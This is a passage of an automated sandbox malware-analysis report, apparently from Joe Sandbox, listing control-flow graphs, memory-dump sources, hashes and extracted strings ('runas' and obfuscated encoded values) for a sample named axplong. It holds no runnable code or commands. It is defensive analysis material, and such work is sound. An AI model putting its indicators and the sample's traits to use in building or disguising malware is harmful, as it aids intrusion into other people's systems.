                                                                                                                                                                            • Instruction ID: c9432dc0646ebd48c1533f09736097bfed6eb50558590d360c4904a70f931f44
                                                                                                                                                                            • Opcode Fuzzy Hash: 149c7728b3c37574e47ae5a59cc7d213a66e2ce171dc6d882ac51a66025509f2
                                                                                                                                                                            • Instruction Fuzzy Hash: F6E18E71900218ABEB24DFA4CC89BDEB779AF04304F9042D9E909A7291D774AFC9CF55

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1505 c57d00-c57d82 call c84020 1509 c5827e-c5829b call c6cf21 1505->1509 1510 c57d88-c57db0 call c67870 call c55b20 1505->1510 1517 c57db4-c57dd6 call c67870 call c55b20 1510->1517 1518 c57db2 1510->1518 1523 c57dd8 1517->1523 1524 c57dda-c57df3 1517->1524 1518->1517 1523->1524 1527 c57df5-c57e04 1524->1527 1528 c57e24-c57e4f 1524->1528 1529 c57e06-c57e14 1527->1529 1530 c57e1a-c57e21 call c6d593 1527->1530 1531 c57e51-c57e60 1528->1531 1532 c57e80-c57ea1 1528->1532 1529->1530 1535 c5829c call c86b9a 1529->1535 1530->1528 1537 c57e76-c57e7d call c6d593 1531->1537 1538 c57e62-c57e70 1531->1538 1533 c57ea7-c57eac 1532->1533 1534 c57ea3 1532->1534 1546 c57ead-c57eb6 1533->1546 1543 c57ea5 1534->1543 1545 c582a1-c582a6 call c86b9a 1535->1545 1537->1532 1538->1535 1538->1537 1543->1546 1549 c57ed4-c57ed7 1546->1549 1550 c57eb8-c57ebf 1546->1550 1553 c57edd-c57ee6 1549->1553 1554 c5821f-c58222 1549->1554 1551 c57ec5-c57ecf 1550->1551 1552 c58279 1550->1552 1555 c58274 1551->1555 1552->1509 1556 c57ef9-c57efc 1553->1556 1557 c57ee8-c57ef4 1553->1557 1554->1552 1558 c58224-c5822d 1554->1558 1555->1552 1559 c57f02-c57f09 1556->1559 1560 c581fc-c581fe 1556->1560 1557->1555 1561 c58254-c58257 1558->1561 1562 c5822f-c58233 1558->1562 1563 c57f0f-c57f6b call c67870 call c55b20 call c67870 call c55b20 call c55c60 1559->1563 1564 c57fe9-c581e5 call c67870 call c55b20 call c67870 call c55b20 call c55c60 call c67870 call c55b20 call c55640 call c67870 call c55b20 call c67870 call c55b20 call c55c60 call c67870 call c55b20 call c55640 call c67870 call c55b20 call c67870 call c55b20 call c55c60 call c67870 call c55b20 call c55640 1559->1564 1569 c58200-c5820a 1560->1569 1570 c5820c-c5820f 1560->1570 1567 c58265-c58271 1561->1567 1568 c58259-c58263 1561->1568 1565 c58235-c5823a 1562->1565 1566 c58248-c58252 1562->1566 1592 c57f70-c57f77 1563->1592 1605 c581eb-c581f4 1564->1605 1565->1566 1572 c5823c-c58246 1565->1572 1566->1552 1567->1555 1568->1552 1569->1555 1570->1552 1574 c58211-c5821d 1570->1574 1572->1552 1574->1555 1594 c57f79 1592->1594 1595 c57f7b-c57f9b call c88a81 1592->1595 1594->1595 1600 c57fd2-c57fd4 1595->1600 1601 c57f9d-c57fac 1595->1601 1600->1605 1606 c57fda-c57fe4 1600->1606 1603 c57fc2-c57fcf call c6d593 1601->1603 1604 c57fae-c57fbc 1601->1604 1603->1600 1604->1545 1604->1603 1605->1554 1610 c581f6 1605->1610 1606->1605 1610->1560
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                                                                                                                                                            • API String ID: 0-2057465332
                                                                                                                                                                            • Opcode ID: 7af89f1f3716153c071357ba77ee8aa3c53a11710ac9ddce531bbae4a817f3f8
                                                                                                                                                                            • Instruction ID: aee885b59193f948f44f82cf765354e8903ad253f4248c3ee1bf578a8d39d91e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7af89f1f3716153c071357ba77ee8aa3c53a11710ac9ddce531bbae4a817f3f8
                                                                                                                                                                            • Instruction Fuzzy Hash: B8D13674E006049BDF24BB28DC5B39D7B71AB46311F900398E816AB3D2DB355EC89BD6

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1644 c565b0-c56609 1719 c5660a call 5230243 1644->1719 1720 c5660a call 5230186 1644->1720 1721 c5660a call 5230195 1644->1721 1722 c5660a call 5230205 1644->1722 1723 c5660a call 52301b4 1644->1723 1724 c5660a call 523021a 1644->1724 1725 c5660a call 52301f9 1644->1725 1726 c5660a call 523029e 1644->1726 1727 c5660a call 523017d 1644->1727 1645 c5660f-c56688 call c67870 call c55b20 1652 c5668c-c566ab call c52280 1645->1652 1653 c5668a 1645->1653 1656 c566ad-c566bc 1652->1656 1657 c566dc-c566e2 1652->1657 1653->1652 1658 c566d2-c566d9 call c6d593 1656->1658 1659 c566be-c566cc 1656->1659 1660 c566e5-c566ea 1657->1660 1658->1657 1659->1658 1661 c56907 call c86b9a 1659->1661 1660->1660 1663 c566ec-c56714 call c67870 call c55b20 1660->1663 1668 c5690c call c86b9a 1661->1668 1673 c56716 1663->1673 1674 c56718-c56739 call c52280 1663->1674 1672 c56911-c56916 call c86b9a 1668->1672 1673->1674 1679 c5673b-c5674a 1674->1679 1680 c5676a-c5677e 1674->1680 1681 c56760-c56767 call c6d593 1679->1681 1682 c5674c-c5675a 1679->1682 1685 c56784-c5678a 1680->1685 1686 c56828-c5684c 1680->1686 1681->1680 1682->1668 1682->1681 1688 c56790-c567bd call c67870 call c55b20 1685->1688 1689 c56850-c56855 1686->1689 1703 c567c1-c567e8 call c52280 1688->1703 1704 c567bf 1688->1704 1689->1689 1690 c56857-c568bc call c67f30 * 2 1689->1690 1700 c568be-c568cd 1690->1700 1701 c568e9-c56906 call c6cf21 1690->1701 1705 c568df-c568e6 call c6d593 1700->1705 1706 c568cf-c568dd 1700->1706 1712 c56819-c5681c 1703->1712 1713 c567ea-c567f9 1703->1713 1704->1703 1705->1701 1706->1672 1706->1705 1712->1688 1714 c56822 1712->1714 1715 c5680f-c56816 call c6d593 1713->1715 1716 c567fb-c56809 1713->1716 1714->1686 1715->1712 1716->1661 1716->1715 1719->1645 1720->1645 1721->1645 1722->1645 1723->1645 1724->1645 1725->1645 1726->1645 1727->1645
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                                                                                                                                                                            • API String ID: 0-3856690409
                                                                                                                                                                            • Opcode ID: 10b6d8d5ed00421ce9fe6f51d021241cbc821a3086abaad0dbdda95b922e31f0
                                                                                                                                                                            • Instruction ID: 92b0195876fbebdc9136549be9ab84debe1ea9f1eef4960db8148e0a769c4527
                                                                                                                                                                            • Opcode Fuzzy Hash: 10b6d8d5ed00421ce9fe6f51d021241cbc821a3086abaad0dbdda95b922e31f0
                                                                                                                                                                            • Instruction Fuzzy Hash: 3991E7B5A001189BDB28DF24CC85BEDB779EF45304F8045E9E51997282DA359FC8CFA8

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1728 c5b920-c5b98f call c68440 1732 c5b9b7 1728->1732 1733 c5b991-c5b9ab 1728->1733 1734 c5b9b9-c5b9bf 1732->1734 1740 c5ba37-c5ba51 1733->1740 1741 c5b9b1 1733->1741 1736 c5b9c1-c5b9d3 1734->1736 1737 c5b9f3-c5ba0d 1734->1737 1742 c5b9d5-c5b9e3 1736->1742 1743 c5b9e9-c5b9f0 call c6d593 1736->1743 1738 c5ba13-c5ba1f 1737->1738 1739 c5ba9e-c5bab9 call c6cf21 1737->1739 1744 c5ba94-c5ba9b call c6d593 1738->1744 1745 c5ba21-c5ba2f 1738->1745 1740->1732 1756 c5ba57-c5ba5c 1740->1756 1741->1732 1742->1743 1747 c5baba-c5babf call c86b9a 1742->1747 1743->1737 1744->1739 1745->1747 1749 c5ba35 1745->1749 1749->1744 1756->1732 1758 c5ba62-c5ba6e 1756->1758 1760 c5ba84-c5ba8f 1758->1760 1761 c5ba70-c5ba7f 1758->1761 1760->1734 1761->1732
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==
                                                                                                                                                                            • API String ID: 0-2524226959
                                                                                                                                                                            • Opcode ID: 17a61445ee466e2eca600988cc11b852a34a09661573a7f1cd2949792e3ab5c6
                                                                                                                                                                            • Instruction ID: 4ff5105b2e1f390a01fffc9ebfdecd07556caa27d8e4ab77d9ebf53674109115
                                                                                                                                                                            • Opcode Fuzzy Hash: 17a61445ee466e2eca600988cc11b852a34a09661573a7f1cd2949792e3ab5c6
                                                                                                                                                                            • Instruction Fuzzy Hash: B041A131A101199FDF04CF68CC85BAE7BB5EF49315F108618F905EB680EB75AD85CB94

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1765 c86e01-c86e36 1767 c86e3c-c86e47 1765->1767 1768 c86eee-c86ef1 1765->1768 1769 c86e69-c86e85 call c84020 1767->1769 1770 c86e49-c86e5a call c87177 1767->1770 1771 c86f1a-c86f42 1768->1771 1772 c86ef3-c86ef6 1768->1772 1781 c86f0b-c86f18 call c8740d 1769->1781 1794 c86e8b-c86ecd call c870c9 call c86f71 * 3 1769->1794 1783 c86e60-c86e67 1770->1783 1784 c86f07-c86f09 1770->1784 1774 c86f5f-c86f61 1771->1774 1775 c86f44-c86f57 1771->1775 1772->1771 1777 c86ef8-c86efa 1772->1777 1780 c86f62-c86f70 call c6cf21 1774->1780 1775->1774 1789 c86f59-c86f5c 1775->1789 1777->1781 1782 c86efc-c86f01 call c87443 1777->1782 1781->1784 1782->1784 1783->1769 1784->1780 1789->1774 1803 c86ed2-c86eea call c87096 1794->1803 1803->1774 1806 c86eec 1803->1806 1806->1784
                                                                                                                                                                            APIs
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C86F12
                                                                                                                                                                              • Part of subcall function 00C87177: __dosmaperr.LIBCMT ref: 00C871AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __dosmaperr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2332233096-0
                                                                                                                                                                            • Opcode ID: 27434a2f9d4f110c3ea195bd541361e626b47c0e2f2efbe9c02a7b429f883c13
                                                                                                                                                                            • Instruction ID: f425f7d4d66ee50cde0435efd3c6e011e21287ce8ee14bd4660d92834d7ab533
                                                                                                                                                                            • Opcode Fuzzy Hash: 27434a2f9d4f110c3ea195bd541361e626b47c0e2f2efbe9c02a7b429f883c13
                                                                                                                                                                            • Instruction Fuzzy Hash: EC418A75900244ABCB24EFB5EC45AAFBBF9EF89304B10452DF956D3610EB31E904DB25

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1807 c594b0-c59529 1809 c59530-c59535 1807->1809 1809->1809 1810 c59537-c59573 call c67f30 call c67870 1809->1810 1815 c596cf-c59728 call c68ad0 1810->1815 1816 c59579 1810->1816 1821 c59810 call c68070 1815->1821 1822 c5972e-c5976d call c67f30 1815->1822 1817 c59580-c595a7 call c67870 call c55b20 1816->1817 1833 c595a9 1817->1833 1834 c595ab-c595f5 call c68ad0 1817->1834 1828 c59815-c5981a call c86b9a 1821->1828 1830 c5976f-c5977e 1822->1830 1831 c5979e-c597c2 1822->1831 1835 c59794-c5979b call c6d593 1830->1835 1836 c59780-c5978e 1830->1836 1838 c597c4-c597d3 1831->1838 1839 c597ef-c5980f call c6cf21 1831->1839 1833->1834 1834->1821 1849 c595fb-c59633 call c67f30 1834->1849 1835->1831 1836->1828 1836->1835 1843 c597e5-c597ec call c6d593 1838->1843 1844 c597d5-c597e3 1838->1844 1843->1839 1844->1828 1844->1843 1853 c59635-c59644 1849->1853 1854 c59664-c5968f 1849->1854 1855 c59646-c59654 1853->1855 1856 c5965a-c59661 call c6d593 1853->1856 1857 c59691-c596a0 1854->1857 1858 c596c0-c596c9 1854->1858 1855->1828 1855->1856 1856->1854 1860 c596b6-c596bd call c6d593 1857->1860 1861 c596a2-c596b0 1857->1861 1858->1815 1858->1817 1860->1858 1861->1828 1861->1860
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: UD==
                                                                                                                                                                            • API String ID: 0-2558787903
                                                                                                                                                                            • Opcode ID: ef5cce011a1864ff38f1e4d63cbe20e8ae99caab75cd021eb57515f32a1ba7c0
                                                                                                                                                                            • Instruction ID: a5ab64b43cc58baed5301ac773eebc3d3d55f51cc1518ea62e0dd8ff7c9b59b7
                                                                                                                                                                            • Opcode Fuzzy Hash: ef5cce011a1864ff38f1e4d63cbe20e8ae99caab75cd021eb57515f32a1ba7c0
                                                                                                                                                                            • Instruction Fuzzy Hash: E5918371A10118CBDB29DF28CC85BEDB7B6EB85304F1082E9D409A7291DB359EC9CF94

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1865 c57780-c577e0 call c685b0 call c68250 1870 c577e2-c577ee 1865->1870 1871 c5780e-c5788d call c67870 * 2 call c55b20 call c67f30 call c57280 1865->1871 1873 c57804-c5780b call c6d593 1870->1873 1874 c577f0-c577fe 1870->1874 1891 c5788f-c5789b 1871->1891 1892 c578bb-c578c1 1871->1892 1873->1871 1874->1873 1876 c5794a call c86b9a 1874->1876 1881 c5794f-c57954 call c86b9a 1876->1881 1895 c578b1-c578b8 call c6d593 1891->1895 1896 c5789d-c578ab 1891->1896 1893 c578c3-c578cf 1892->1893 1894 c578eb-c57903 1892->1894 1897 c578e1-c578e8 call c6d593 1893->1897 1898 c578d1-c578df 1893->1898 1899 c57905-c57911 1894->1899 1900 c5792d-c57949 call c6cf21 1894->1900 1895->1892 1896->1881 1896->1895 1897->1894 1898->1881 1898->1897 1903 c57923-c5792a call c6d593 1899->1903 1904 c57913-c57921 1899->1904 1903->1900 1904->1881 1904->1903
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: runas
                                                                                                                                                                            • API String ID: 0-4000483414
                                                                                                                                                                            • Opcode ID: 94dcc1ebec18246130131b339f1a4d6bb2c0b7bcc36c20cf7b97819464ae080c
                                                                                                                                                                            • Instruction ID: 42d3dfee35feae370a7e3b5c494c733fc7e135d48f204783b37f533d07488d67
                                                                                                                                                                            • Opcode Fuzzy Hash: 94dcc1ebec18246130131b339f1a4d6bb2c0b7bcc36c20cf7b97819464ae080c
                                                                                                                                                                            • Instruction Fuzzy Hash: 94514871A101449BEB18EF28DC8A79D7B62EF45318F10831CF816AB3C5DB359AC9C7A5

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1911 c642a0-c64302 call c67870 * 2 call c584b0 1918 c64556-c64597 call c67870 * 3 call c63550 1911->1918 1919 c64308-c64325 1911->1919 1921 c6459a-c645a0 1918->1921 1919->1921 1922 c6432b 1919->1922 1925 c645a2-c645ae 1921->1925 1926 c645ce-c645e6 1921->1926 1924 c64330-c643a6 call c67f30 call c691b0 1922->1924 1961 c643dd-c643f0 1924->1961 1962 c643a8-c643b4 1924->1962 1929 c645c4-c645cb call c6d593 1925->1929 1930 c645b0-c645be 1925->1930 1931 c64614-c6462c 1926->1931 1932 c645e8-c645f4 1926->1932 1929->1926 1930->1929 1937 c64656-c6466e 1931->1937 1938 c6462e-c6463a 1931->1938 1933 c645f6-c64604 1932->1933 1934 c6460a-c64611 call c6d593 1932->1934 1933->1934 1934->1931 1945 c64670-c6467c 1937->1945 1946 c64698-c646b2 call c6cf21 1937->1946 1943 c6464c-c64653 call c6d593 1938->1943 1944 c6463c-c6464a 1938->1944 1943->1937 1944->1943 1953 c6468e-c64695 call c6d593 1945->1953 1954 c6467e-c6468c 1945->1954 1953->1946 1954->1953 1966 c643f2-c643fe 1961->1966 1967 c6441e-c6448e call c67f30 call c693a0 1961->1967 1964 c643b6-c643c4 1962->1964 1965 c643ca-c643d8 call c6d593 1962->1965 1964->1965 1965->1961 1970 c64414-c6441b call c6d593 1966->1970 1971 c64400-c6440e 1966->1971 1979 c64490-c6449b 1967->1979 1980 c644bb-c644bf 1967->1980 1970->1967 1971->1970 1981 c644b1-c644b8 call c6d593 1979->1981 1982 c6449d-c644ab 1979->1982 1983 c64514-c6451a 1980->1983 1984 c644c1-c644fd call c67870 * 3 call c63550 1980->1984 1981->1980 1982->1981 1983->1924 1985 c64520-c64526 1983->1985 2000 c64502-c6450f call c67f30 1984->2000 1985->1921 1989 c64528-c64534 1985->1989 1992 c64536-c64544 1989->1992 1993 c6454a-c64554 call c6d593 1989->1993 1992->1993 1993->1921 2000->1983
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
